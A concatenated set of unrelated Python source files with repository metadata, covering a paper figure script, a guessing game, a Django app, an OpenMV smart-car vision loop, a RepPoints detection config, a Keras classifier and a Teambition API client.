bd431296d97908483db2f5be2d472074fcd03fe7
|
c08eba53c63ef7a410797491c60dd6dd0975ad62
|
refs/heads/master
| 2021-07-31T20:13:47.490159 | 2021-07-27T21:27:06 | 2021-07-27T21:27:06 | 232,321,758 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,727 |
py
|
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
import pandas as pd
import os
import matplotlib as mpl
#from Unicorn.Figures import nature_guidline_utils
from dark import cmap_map
from URA_paper.Figures import nature_guidline_utils
sns.set_style("ticks", {'axes.edgecolor': 'black'})
pd.set_option('display.width', 1000)
np.set_printoptions(precision=4, linewidth=200)
FIGURES_DIR = '/net/mraid08/export/jafar/Microbiome/Analyses/Unicorn/Cohort_Paper/revision_Analyses/figures'
params = {
'axes.labelsize': 10,
'font.size': 10,
'legend.fontsize': 10,
'xtick.labelsize': 8,
'ytick.labelsize': 8,
'figure.dpi': 300,
'axes.linewidth': 0.5,
}
fontsize = 10
plt.rcParams.update(params)
fig = plt.figure(figsize=(nature_guidline_utils.two_columns(),
nature_guidline_utils.full_page()*0.8*0.2), dpi=300) # m2inch(165)
import matplotlib.gridspec as gridspec
green=(47./255,142./255,52./255)
violet = (106./255,111./255,205./255)
two_colors = [violet,green]#colors_rgb[-2:]
axdrest_grid_bottom = gridspec.GridSpec(1,3,wspace=0.7,width_ratios=[1./3,1./3,1./3])
ax__age_saturation = plt.subplot(axdrest_grid_bottom[0,0])
ax__hba1c_saturation = plt.subplot(axdrest_grid_bottom[0,1])
ax__bmi_saturation = plt.subplot(axdrest_grid_bottom[0,2])
plt.sca(ax__age_saturation)
plt.text(-.53, 1.15, 'a', ha='center', va='center', transform=ax__age_saturation.transAxes, fontsize=16)
saturation_df=pd.read_csv(os.path.join(FIGURES_DIR,'Figures - age_saturation_US.csv'))
saturation_df.sort_values(by='cohort_size',inplace=True)
saturation_df.loc[:,['mean_pearson','mean_std']] = saturation_df.loc[:,['mean_pearson','mean_std']].mul(100)
ax__age_saturation.errorbar(saturation_df['cohort_size'],saturation_df['mean_pearson'],
yerr=saturation_df['mean_std'],color=two_colors[0])
saturation_df.loc[:,['mean_pearson_linear','mean_std_linear']] = saturation_df.loc[:,['mean_pearson_linear','mean_std_linear']].mul(100)
ax__age_saturation.errorbar(saturation_df['cohort_size'],saturation_df['mean_pearson_linear'],
yerr=saturation_df['mean_std_linear'],color=two_colors[1])
ax__age_saturation.tick_params(top='off',right='off',pad=2,labelsize=fontsize)
ax__age_saturation.yaxis.set_ticks_position('left')
ax__age_saturation.xaxis.set_ticks_position('bottom')
ax__age_saturation.spines['right'].set_visible(False)
ax__age_saturation.spines['top'].set_visible(False)
ax__age_saturation.set_xlim([0,20000])
ax__age_saturation.set_xticks([0,10000,20000])
plt.ylim(0,20)
ax__age_saturation.set_yticks([0,10,20])
plt.xlabel('Sample size')
plt.ylabel('age $R^{2}$ (%)')
plt.legend(['GBDT','Ridge'],bbox_to_anchor=(1.15, 0.0),frameon=False,loc=4)
plt.sca(ax__hba1c_saturation)
plt.text(-0.2, 1.15, 'b', ha='center', va='center', transform=ax__hba1c_saturation.transAxes, fontsize=16)
saturation_df=pd.read_csv(os.path.join(FIGURES_DIR,'Figures - hba1c_saturation_US.csv'))
saturation_df.sort_values(by='cohort_size',inplace=True)
saturation_df.loc[:,['mean_pearson','mean_std']] = saturation_df.loc[:,['mean_pearson','mean_std']].mul(100)
ax__hba1c_saturation.errorbar(saturation_df['cohort_size'],saturation_df['mean_pearson'],
yerr=saturation_df['mean_std'],color=two_colors[0])
saturation_df.loc[:,['mean_pearson_linear','mean_std_linear']] = saturation_df.loc[:,['mean_pearson_linear','mean_std_linear']].mul(100)
ax__hba1c_saturation.errorbar(saturation_df['cohort_size'],saturation_df['mean_pearson_linear'],
yerr=saturation_df['mean_std_linear'],color=two_colors[1])
ax__hba1c_saturation.tick_params(top='off',right='off',pad=2,labelsize=fontsize)
ax__hba1c_saturation.yaxis.set_ticks_position('left')
ax__hba1c_saturation.xaxis.set_ticks_position('bottom')
ax__hba1c_saturation.spines['right'].set_visible(False)
ax__hba1c_saturation.spines['top'].set_visible(False)
ax__hba1c_saturation.set_xlim([0,16000])
ax__hba1c_saturation.set_xticks([0,7500,15000])
plt.ylim(0,10)
ax__hba1c_saturation.set_yticks([0,5,10])#,20])
plt.xlabel('Sample size')
plt.ylabel('HbA1C% $R^{2}$ (%)')
plt.sca(ax__bmi_saturation)
plt.text(-.25, 1.15, 'c', ha='center', va='center', transform=ax__bmi_saturation.transAxes, fontsize=16)
saturation_df=pd.read_csv(os.path.join(FIGURES_DIR,'Figures - bmi_saturation_US.csv'))
saturation_df.sort_values(by='cohort_size',inplace=True)
saturation_df.loc[:,['mean_pearson','mean_std']] = saturation_df.loc[:,['mean_pearson','mean_std']].mul(100)
ax__bmi_saturation.errorbar(saturation_df['cohort_size'],saturation_df['mean_pearson'],
yerr=saturation_df['mean_std'],color=two_colors[0])
saturation_df.loc[:,['mean_pearson_linear','mean_std_linear']] = saturation_df.loc[:,['mean_pearson_linear','mean_std_linear']].mul(100)
ax__bmi_saturation.errorbar(saturation_df['cohort_size'],saturation_df['mean_pearson_linear'],
yerr=saturation_df['mean_std_linear'],color=two_colors[1])
ax__bmi_saturation.tick_params(top='off',right='off',pad=2,labelsize=fontsize)
ax__bmi_saturation.yaxis.set_ticks_position('left')
ax__bmi_saturation.xaxis.set_ticks_position('bottom')
ax__bmi_saturation.spines['right'].set_visible(False)
ax__bmi_saturation.spines['top'].set_visible(False)
ax__bmi_saturation.set_xlim([0,20000])
ax__bmi_saturation.set_xticks([0,10000,20000])
ax__bmi_saturation.set_yticks([0,5,10,15])
plt.xlabel('Sample size')
# plt.ylabel('')
plt.ylabel('BMI $R^{2}$ (%)')
plt.ylim(0,15)
plt.savefig(os.path.join(FIGURES_DIR, 'figureS_4.pdf'), bbox_inches='tight', format='pdf')
plt.savefig(os.path.join(FIGURES_DIR, 'figureS_4.png'), bbox_inches='tight', format='png')
|
[
"aaaa85Al"
] |
aaaa85Al
|
7085b43ca65f48b5500e2da986e2f06eda812634
|
b2eaa0024ba6c8c7986bf3e107deb7308e3658d0
|
/python/06_day/try_guess.py
|
494995380aa080787578df45b3f4f6c1e3b94487
|
[] |
no_license
|
olitskevich/szkolenie
|
aabf9589b0d5114761e77a0a4934821e1ba051ac
|
0e8d752e9753f262edae58d61795544c34fb6563
|
refs/heads/master
| 2020-04-25T05:51:52.234718 | 2019-03-09T14:42:56 | 2019-03-09T14:42:56 | 172,557,290 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 741 |
py
|
import random
random_number = random.randint(0,100)
attempt = 0
max_attempt = 7
my_number = 555
try:
while my_number != random_number:
print("Your mumber: ")
my_number = int(input())
attempt+=1
if my_number == random_number:
print("Congratulation! You've guessed the number from the", attempt, "attemp")
else:
if my_number > random_number:
print("Choose smaller number")
else:
print("Choose bigger number")
if attempt >= max_attempt:
print("Sorry! You have no more attempts, the correct number is", random_number)
break
except KeyboardInterrupt:
print ("Thanks for participation")
|
[
"[email protected]"
] | |
7df75a268c13f4de545db13ec51df02cd9cdbda5
|
ddcc89dc88961f37d50c0f9d893f265bf34afdb3
|
/test/test_simple_module_pass.py
|
f6be33ae365cbfb62819b6d08a8740fcd1ff5120
|
[
"Unlicense",
"LicenseRef-scancode-unknown-license-reference",
"NCSA",
"LicenseRef-scancode-public-domain"
] |
permissive
|
mulle-nat/property-syntax-modernizer
|
f351319314a0216e5e241fa03f9d95a3764a6590
|
93445534221840d0df6cfb2d2f4ceb73f37ac962
|
refs/heads/master
| 2020-08-07T08:57:02.149734 | 2019-10-07T12:46:11 | 2019-10-07T12:46:11 | 213,381,270 | 0 | 0 |
Unlicense
| 2019-10-07T13:11:51 | 2019-10-07T12:47:05 |
C++
|
UTF-8
|
Python
| false | false | 442 |
py
|
import sys, unittest
from tools import SamplesTestCase
OUTPUT_FOR_GLOBALS = '''\
Found global named "gfloat": type = float*
Found global named "gppfloat": type = float***
Found global named "gint": type = i32*
'''
PROG = 'simple_module_pass'
class TestSimpleModulePass(SamplesTestCase):
def test_on_globals(self):
self.assertSampleOutput([PROG], 'globals.ll', OUTPUT_FOR_GLOBALS)
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
244651275300889c2f7a9b4928af9c1940ad6614
|
4be9a5bdb8e051001b78c8f127ccc1a7f85c14e7
|
/bugzilla/migrations/0002_auto_20170205_1515.py
|
6b518a7b30a1bea8b1cda0d937046f6fe0febbe5
|
[] |
no_license
|
quentin-david/heimdall
|
f72a85606e7ab53683df2023ef5eaba762198211
|
84a429ee52e1891bc2ee4eb07a084dff209c789c
|
refs/heads/master
| 2021-01-21T10:26:28.895663 | 2017-07-21T19:19:46 | 2017-07-21T19:19:46 | 83,432,596 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 638 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-02-05 15:15
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('bugzilla', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='bugzilla',
options={'ordering': ['-date_update']},
),
migrations.AlterField(
model_name='bugzilla',
name='state',
field=models.CharField(choices=[('open', 'Open'), ('close', 'Close'), ('info', 'Info')], max_length=15),
),
]
|
[
"[email protected]"
] | |
56949c4db28de69646a0608078ccaa2021987d61
|
4de645802568e0317654e75afbe6d79db69317e5
|
/pythonx/snippet_helpers.py
|
53c12d4bac09f6abed674f1b50d73b5819df9624
|
[] |
no_license
|
liiil825/dotvim
|
25da0b499f0b94c69d26336d9917e3019e4c8262
|
40dea6d8970b02a8d141909207ff72bb1e9723c8
|
refs/heads/master
| 2023-04-05T22:31:48.199682 | 2023-03-29T08:39:04 | 2023-03-29T08:39:04 | 34,794,542 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 135 |
py
|
def fraction( a, b ):
try:
return "%.1f" % ( float( a ) / float( b ) )
except ( ValueError, ZeroDivisionError ):
return "ERR"
|
[
"[email protected]"
] | |
5221169cb09ef2c4efb91362996d07102086d2d9
|
fb8b3a8d5aff40d9d3169e53d94887f3053eb891
|
/19国赛openmv/main.py
|
77bf04f6390b17960c8a744531ea18e21cc7f910
|
[] |
no_license
|
nmgzzy/smart-car-history
|
e4f887da98bd53a59ac8c0c42cc3933d59d4e8a1
|
7d5f7eecb9692792a345ef8092add42013e2bb4a
|
refs/heads/master
| 2021-04-01T21:15:26.868584 | 2020-03-18T12:16:15 | 2020-03-18T12:16:15 | 248,215,450 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 8,989 |
py
|
import sensor, image, time, pyb
import my_ips, my_file, my_uart, my_key
sensor.reset()
sensor.set_pixformat(sensor.RGB565)
sensor.set_framerate(2<<11)
sensor.set_framesize(sensor.QQVGA)#160x120
my_ips.init()
sensor.skip_frames(time = 500)
sensor.set_auto_gain(False)
sensor.set_auto_whitebal(False)
sensor.skip_frames(time = 100)
clock = time.clock()
ledR = pyb.LED(1)
ledG = pyb.LED(2)
ledB = pyb.LED(3)
ledB.on()
ledR.on()
ledG.on()
colorxy = 0
img_cnt = 0
red_threshold = [[12, 80, 16, 73, -1, 56],[12, 80, 16, 73, -1, 56],[12, 80, 16, 73, -1, 56],[0, 70, 19, 90, -11, 35]]
blue_threshold = [0, 50, -128, 127, -128, -5]
black_threshold = [0, 15, -128, 127, -128, 127]
white_threshold = [40, 100, -128, 127, -128, 127]
red_ch = 0
roi_white = [(109,0,2,120),(113,0,2,120),(117,0,2,120),(121,0,2,120)]
roi_white2 = [73,0,2,120]
roi_blue = [(0,21,33,77),(12,21,56,77),(0,21,68,77)]
roi_red = (47,25,103,70)
chioce = 2
def find_max(blobs):
max_size=0
for blob in blobs:
if blob[2]*blob[3] > max_size:
max_blob=blob
max_size = blob[2]*blob[3]
return max_blob
def my_cmp(a, b):
if a == b:
return (20,255,20)
else:
return (255,255,255)
def display(page, x, y, k, save):
global img_cnt
global red_ch
clock.tick()
img = sensor.snapshot()
if save:
img.save("img\\img%02d.jpg"%img_cnt)
img_cnt += 1
global colorxy
blobs = img.find_blobs([red_threshold[red_ch]], roi = roi_red, x_stride=5, y_stride=10, pixels_threshold=200)
if blobs:
road = find_max(blobs)
img.draw_rectangle(road.rect())
blobs = img.find_blobs([blue_threshold, black_threshold], roi = roi_blue[2], x_stride=3, y_stride=6, pixels_threshold=64)
if blobs:
road = find_max(blobs)
img.draw_rectangle(road.rect())
blobs = img.find_blobs([white_threshold], roi = roi_white[chioce], pixels_threshold=9)
if blobs:
road = find_max(blobs)
img.draw_rectangle(road.rect())
print(clock.fps())
if x == 3 and y == 0:
img.binary([white_threshold], zero = True)
else:
if y < 2:
img.binary([red_threshold[red_ch]], zero = True)
else:
img.binary([blue_threshold], zero = True)
img.draw_string(0,0, str(red_threshold[red_ch][0]),color = my_cmp(colorxy, 0),x_spacing = -2)
img.draw_string(0,10, str(red_threshold[red_ch][1]),color = my_cmp(colorxy, 1),x_spacing = -2)
img.draw_string(40,0, str(red_threshold[red_ch][2]),color = my_cmp(colorxy, 2),x_spacing = -2)
img.draw_string(40,10,str(red_threshold[red_ch][3]),color = my_cmp(colorxy, 3),x_spacing = -2)
img.draw_string(80,0, str(red_threshold[red_ch][4]),color = my_cmp(colorxy, 4),x_spacing = -2)
img.draw_string(80,10,str(red_threshold[red_ch][5]),color = my_cmp(colorxy, 5),x_spacing = -2)
img.draw_string(0, 20,"red", color = (255,255,255), x_spacing = -2)
img.draw_string(120,0,"wt:", color = my_cmp(colorxy, 6),x_spacing = -2)
img.draw_string(140,0,str(white_threshold[0]),color = my_cmp(colorxy, 6),x_spacing = -2)
img.draw_string(120,10,str(red_ch), color = (255,255,0), x_spacing = -2)
img.draw_string(0,90, "blue", color = (255,255,255), x_spacing = -2)
img.draw_string(0,100, str(blue_threshold[0]),color = my_cmp(colorxy, 8),x_spacing = -2)
img.draw_string(0,110, str(blue_threshold[1]),color = my_cmp(colorxy, 9),x_spacing = -2)
img.draw_string(40,100,str(blue_threshold[2]),color = my_cmp(colorxy, 10),x_spacing = -2)
img.draw_string(40,110,str(blue_threshold[3]),color = my_cmp(colorxy, 11),x_spacing = -2)
img.draw_string(80,100,str(blue_threshold[4]),color = my_cmp(colorxy, 12),x_spacing = -2)
img.draw_string(80,110,str(blue_threshold[5]),color = my_cmp(colorxy, 13),x_spacing = -2)
img.draw_string(120,110, "blk", color = my_cmp(colorxy, 14),x_spacing = -2)
img.draw_string(140,110,str(black_threshold[1]),color = my_cmp(colorxy, 14),x_spacing = -2)
if page == 0:
my_ips.display_QQVGA(0, 0, img)
if x == 0:
if y == 0:
red_threshold[red_ch][0] += k
colorxy = 0
elif y == 1:
red_threshold[red_ch][1] += k
colorxy = 1
elif y == 2:
blue_threshold[0] += k
colorxy = 8+0
elif y == 3:
blue_threshold[1] += k
colorxy = 8+1
elif x == 1:
if y == 0:
red_threshold[red_ch][2] += k
colorxy = 2
elif y == 1:
red_threshold[red_ch][3] += k
colorxy = 3
elif y == 2:
blue_threshold[2] += k
colorxy = 8+2
elif y == 3:
blue_threshold[3] += k
colorxy = 8+3
elif x == 2:
if y == 0:
red_threshold[red_ch][4] += k
colorxy = 4
elif y == 1:
red_threshold[red_ch][5] += k
colorxy = 5
elif y == 2:
blue_threshold[4] += k
colorxy = 8+4
elif y == 3:
blue_threshold[5] += k
colorxy = 8+5
elif x == 3:
if y == 0:
white_threshold[0] += k
colorxy = 6
elif y == 1:
red_ch += k
colorxy = 7
elif y == 3:
black_threshold[1] += k
colorxy = 8+6
def systemUI():
page = 0
Xsite = 0
Ysite = 0
global red_threshold
global blue_threshold
global black_threshold
global white_threshold
global red_ch
[red_threshold, blue_threshold, black_threshold, white_threshold, red_ch] = my_file.read_parameter()
my_ips.showstr(161, 0, "bR 30:127")
my_ips.showstr(161, 1, " -50:50")
my_ips.showstr(161, 3, "R 40:127")
my_ips.showstr(161, 4, " -20:70")
my_ips.showstr(161, 6, "yR 30:127")
my_ips.showstr(161, 7, " 10:127")
while(True):
save = 0
key = my_key.get_key()
if key == 3:#r
if Xsite<3:
Xsite += 1
elif key == 6:#l
if Xsite>0:
Xsite -= 1
elif key == 2:#u
if Ysite>0:
Ysite -= 1
elif key == 0:#d
if Ysite<3:
Ysite += 1
elif key == 1:#m
save = 1
if key == 4:
k = 1
elif key == 5:
k = -1
else:
k = 0
display(page, Xsite, Ysite, k, save)
if my_uart.read() == 0x0F:
break
my_file.save_parameter(red_threshold, blue_threshold, black_threshold, white_threshold, red_ch)
ledR.off()
ledB.off()
my_ips.spi.deinit()
time.sleep(200)
ledG.off()
def main():
while True:
clock.tick()
pix = 0
break_road = 0
cnt1 = 0
cnt2 = 0
mode = 0
hh = 0
cc = 0
img = sensor.snapshot()
t = my_uart.read()
if t!= None:
mode = t >> 7
offset = t & 0x7F
blobs = img.find_blobs([red_threshold[red_ch]], roi = roi_red, x_stride=5, y_stride=10, pixels_threshold=200)
if blobs:
road = find_max(blobs)
pix = road.pixels() * 255 // 3000
if pix > 255:
pix = 255
if mode == 0:
blobs = img.find_blobs([blue_threshold, black_threshold], roi = roi_blue[0], x_stride=3, y_stride=6, pixels_threshold=100)
if blobs:
road = find_max(blobs)
break_road = road.pixels()*255//2500
else:
blobs = img.find_blobs([blue_threshold, black_threshold], roi = roi_blue[1], x_stride=3, y_stride=6, pixels_threshold=100)
if blobs:
road = find_max(blobs)
break_road = (road.pixels()-150)*255//3400
if break_road < 0:
break_road = 0
if break_road > 255:
break_road = 255
if mode == 1:
blobs = img.find_blobs([white_threshold], roi = roi_white[chioce], pixels_threshold=20)
if blobs:
road = find_max(blobs)
hh = road.h()
cc = road.cy()+1
else:
roi_white2[0] = int(-0.3297*offset+106.2)-3
blobs = img.find_blobs([white_threshold], roi = roi_white2, pixels_threshold=20)
if blobs:
road = find_max(blobs)
hh = road.h()
cc = road.cy()+1
my_uart.send(pix,break_road,cc,hh)
if pix > 30:
ledR.on()
else:
ledR.off()
if break_road > 170:
ledB.on()
else:
ledB.off()
print(clock.fps())
systemUI()
main()
|
[
"[email protected]"
] | |
a3cf7cefbf7e8537e0c1fe7a704c4158e33f881b
|
39e03684081b27311385a0ab31afcc2e09883e5c
|
/configs/reppoints/bbox_r50_grid_center_fpn_1x.py
|
f971b5b7b8c78a6abca727e7015b96d085b5f33b
|
[
"MIT",
"Python-2.0"
] |
permissive
|
witnessai/MMSceneGraph
|
8d0b2011a946ddcced95fbe15445b7f4da818509
|
bc5e0f3385205404c712ae9f702a61a3191da0a1
|
refs/heads/master
| 2023-08-12T06:54:00.551237 | 2021-10-12T03:04:21 | 2021-10-12T03:04:21 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,462 |
py
|
# model settings
norm_cfg = dict(type='GN', num_groups=32, requires_grad=True)
model = dict(
type='RepPointsDetector',
pretrained='torchvision://resnet50',
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
norm_cfg=dict(type='BN', requires_grad=True),
style='pytorch'),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
start_level=1,
add_extra_convs=True,
num_outs=5,
norm_cfg=norm_cfg),
bbox_head=dict(
type='RepPointsHead',
num_classes=81,
in_channels=256,
feat_channels=256,
point_feat_channels=256,
stacked_convs=3,
num_points=9,
gradient_mul=0.1,
point_strides=[8, 16, 32, 64, 128],
point_base_scale=4,
norm_cfg=norm_cfg,
loss_cls=dict(
type='FocalLoss',
use_sigmoid=True,
gamma=2.0,
alpha=0.25,
loss_weight=1.0),
loss_bbox_init=dict(type='SmoothL1Loss', beta=0.11, loss_weight=0.5),
loss_bbox_refine=dict(type='SmoothL1Loss', beta=0.11, loss_weight=1.0),
transform_method='minmax',
use_grid_points=True))
# training and testing settings
train_cfg = dict(
init=dict(
assigner=dict(type='PointAssigner', scale=4, pos_num=1),
allowed_border=-1,
pos_weight=-1,
debug=False),
refine=dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.5,
neg_iou_thr=0.4,
min_pos_iou=0,
ignore_iof_thr=-1),
allowed_border=-1,
pos_weight=-1,
debug=False))
test_cfg = dict(
nms_pre=1000,
min_bbox_size=0,
score_thr=0.05,
nms=dict(type='nms', iou_thr=0.5),
max_per_img=100)
# dataset settings
dataset_type = 'CocoDataset'
data_root = 'data/coco/'
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(type='Resize', img_scale=(1333, 800), keep_ratio=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(1333, 800),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
imgs_per_gpu=2,
workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_train2017.json',
img_prefix=data_root + 'train2017/',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline))
evaluation = dict(interval=1, metric='bbox')
# optimizer
optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[8, 11])
checkpoint_config = dict(interval=1)
# yapf:disable
log_config = dict(
interval=50,
hooks=[
dict(type='TextLoggerHook'),
# dict(type='TensorboardLoggerHook')
])
# yapf:enable
# runtime settings
total_epochs = 12
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/bbox_r50_grid_center_fpn_1x'
load_from = None
resume_from = None
workflow = [('train', 1)]
|
[
"[email protected]"
] | |
f1c755702c61d3a4c3f5e88391da6a3096250b2f
|
5399dd4580ea3f528753bc8b52a981743d62f8bb
|
/keras/keras36_hist3_wine.py
|
6844fef8e2c4a5ad39b62167985de24abdf45314
|
[] |
no_license
|
iwillbeaprogramer/Study
|
3ac7c118ffe3981d78b4ad263cb62432eae13970
|
3bfe571da5bbfc545b994e5878e217f9306bde14
|
refs/heads/main
| 2023-05-07T16:31:05.564973 | 2021-05-27T14:50:00 | 2021-05-27T14:50:00 | 324,044,441 | 8 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,733 |
py
|
from sklearn.datasets import load_wine
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler,OneHotEncoder
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
from tensorflow.keras.callbacks import EarlyStopping
import matplotlib.pyplot as plt
early_stopping = EarlyStopping(monitor='loss',patience=10)
datasets = load_wine()
x = datasets.data
y = datasets.target
encoder = OneHotEncoder()
y = encoder.fit_transform(y.reshape(-1,1)).toarray()
x_train,x_test,y_train,y_test = train_test_split(x,y,test_size=0.2)
x_train,x_val,y_train,y_val = train_test_split(x_train,y_train,test_size=0.2)
scaler = MinMaxScaler()
x_train = scaler.fit_transform(x_train)
x_test = scaler.fit_transform(x_test)
x_val = scaler.fit_transform(x_val)
model = Sequential()
model.add(Dense(128,activation='relu',input_dim=13))
model.add(Dense(64,activation='relu'))
model.add(Dense(32,activation='relu'))
model.add(Dense(16,activation='relu'))
model.add(Dense(8,activation='relu'))
model.add(Dense(3,activation='softmax'))
model.compile(loss = 'categorical_crossentropy',optimizer='adam',metrics=['accuracy'])
hist = model.fit(x_train,y_train,validation_data=(x_val,y_val),epochs=300,batch_size=4)
loss = model.evaluate(x_test,y_test,batch_size=4)
y_pred = model.predict(x_test)
print('loss : ',loss[0],'\naccuracy : ',loss[1])
'''
DNN
loss : 3.391478821868077e-05
accuracy : 1.0
'''
plt.plot(hist.history['loss'])
plt.plot(hist.history['val_loss'])
plt.plot(hist.history['accuracy'])
plt.plot(hist.history['val_accuracy'])
plt.title('loss & acc')
plt.ylabel('loss, acc')
plt.xlabel('epochs')
plt.legend(['train_loss','val_loss','train_acc','val_acc'])
plt.show()
|
[
"[email protected]"
] | |
ae1a109105467ef139d1001e81abe371486a106d
|
15e0928f1fad3c4a21823bdce4bc4e76d3d2801a
|
/teambitionHelp.py
|
1fe4180389083c096e89e89d77983d59e77ec661
|
[] |
no_license
|
HuangJT/teambitionApi
|
a610b70ffa1492804f9b63afe57c844ceb7ece70
|
12494bba65246f1e548792bc3a02b87e05f59a81
|
refs/heads/master
| 2022-07-05T21:59:55.998780 | 2020-05-11T02:43:58 | 2020-05-11T02:43:58 | 262,920,368 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,090 |
py
|
# -*- coding: UTF-8 -*-
import requests
import json
import pymysql
from pymysql import cursors
import time
import urllib
import codecs
from datetime import datetime, date, timedelta
# pip install PyJWT
import jwt
import sys
# reload(sys)
# sys.setdefaultencoding('utf8')
from settings import SETTINGS
class TeambitionHelp:
__tbAppId = "" # api token
__tbSecrect = ""
__accessToken = ""
def __init__(self):
self.__tbAppId = SETTINGS["TB_APP_ID"]
self.__tbSecrect = SETTINGS["TB_APP_SECRECT"]
expire_time = int(time.time() + 3600) # 1 小时后超时
encoded = jwt.encode({'_appId': self.__tbAppId, 'exp': expire_time}, self.__tbSecrect, algorithm='HS256')
# print(encoded)
encoded_str = str(encoded, encoding='utf-8')
# print(encoded_str)
self.__accessToken = encoded_str
def __getAuthHeaders(self):
return {'Authorization': 'Bearer '+ self.__accessToken,'X-Tenant-Id':SETTINGS['TB_ORG_ID'],'X-Tenant-Type':'organization'}
def logf(self,content):
logContent = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()) + " " + content + "\n"
logFile = codecs.open(SETTINGS['LOG_FILE'], 'a', encoding='utf-8')
logFile.write(logContent)
print(logContent)
logFile.close()
def getOrgInfo(self):
res = requests.get(SETTINGS["URL_TB_GET_ORG_INFO"] + "?orgId="+ SETTINGS["TB_ORG_ID"],headers=self.__getAuthHeaders())
print(res.content.decode("utf-8"))
# resJson = json.loads(res.content.decode("utf-8"))
def getTaskGroup(self,groupId):
res = requests.get(SETTINGS["URL_TB_GET_TASK_GROUP"] + "?projectId="+ groupId,headers=self.__getAuthHeaders())
print(res.content.decode("utf-8"))
resJson = json.loads(res.content.decode("utf-8"))
return resJson.get("result")
def getTaskList(self,taskListId):
res = requests.get(SETTINGS["URL_TB_GET_TASK_LIST"] + "?tasklistId="+ taskListId,headers=self.__getAuthHeaders())
print(res.content.decode("utf-8"))
resJson = json.loads(res.content.decode("utf-8"))
return resJson.get("result")
def getTasksByTql(self,tql):
res = requests.post(SETTINGS["URL_TB_GET_TASK_TQL"] ,json={"tql":tql},headers=self.__getAuthHeaders())
print(res.content.decode("utf-8"))
resJson = json.loads(res.content.decode("utf-8"))
return resJson.get("result")
def main():
teambitionHelp = TeambitionHelp()
# groupList = teambitionHelp.getTaskGroup(SETTINGS["TB_PROJECT_ID_DEVELOP"])
# for group in groupList:
# print(group.get("name"))
# # print(group.get("tasklistIds"))
# for taskListId in group.get("tasklistIds"):
# print(teambitionHelp.getTaskList(taskListId))
tasks = teambitionHelp.getTasksByTql("projectId=" + SETTINGS["TB_PROJECT_ID_DEVELOP"] + " AND id = 5e78xxxxxxx7880 " )
for task in tasks:
print(task)
print("\n")
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
84340a119e8fdb72320174077f9aa1c0605ca64f
|
9d566e153a254390ed758f4e945781899b6dcd07
|
/03_django/02_django_crud/articles/views.py
|
e9c78e872870c579df912051bc9513f1f01afb88
|
[] |
no_license
|
baambox5/TIL
|
6f1b0fdc342ed29b85a68404b916fc6f4cace7bf
|
0419779ccbf506a1e89d581b98658dd07b78388c
|
refs/heads/master
| 2023-01-13T01:14:08.125234 | 2020-01-17T14:36:34 | 2020-01-17T14:36:34 | 195,918,108 | 0 | 0 | null | 2023-01-07T11:27:08 | 2019-07-09T02:31:02 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 2,964 |
py
|
from IPython import embed
from django.core.exceptions import ValidationError
from django.shortcuts import render, redirect
from .models import Article, Comment
# Create your views here.
def index(request):
# articles = Article.objects.all()
articles = Article.objects.order_by('-pk') # DB가 변경(가능한 권장)
# articles = Article.objects.all()[::-1] # python이 변경
context = {'articles': articles,}
return render(request, 'articles/index.html', context)
def create(request):
# CREATE
if request.method == 'POST':
title = request.POST.get('title')
content = request.POST.get('content')
image = request.FILES.get('image')
# 1
# article = Article()
# article.title = title
# article.content = content
# article.save()
# 2
article = Article(title=title, content=content, image=image)
article.save()
# 3
# Article.objects.create(title=title, content=content)
return redirect(article) # 메인 페이지
# return redirect('/articles/', article.pk)
# NEW
else:
return render(request, 'articles/create.html')
def detail(request, article_pk):
article = Article.objects.get(pk=article_pk)
comments = article.comment_set.all()
context = {'article': article, 'comments': comments,}
return render(request, 'articles/detail.html', context)
def delete(request, article_pk):
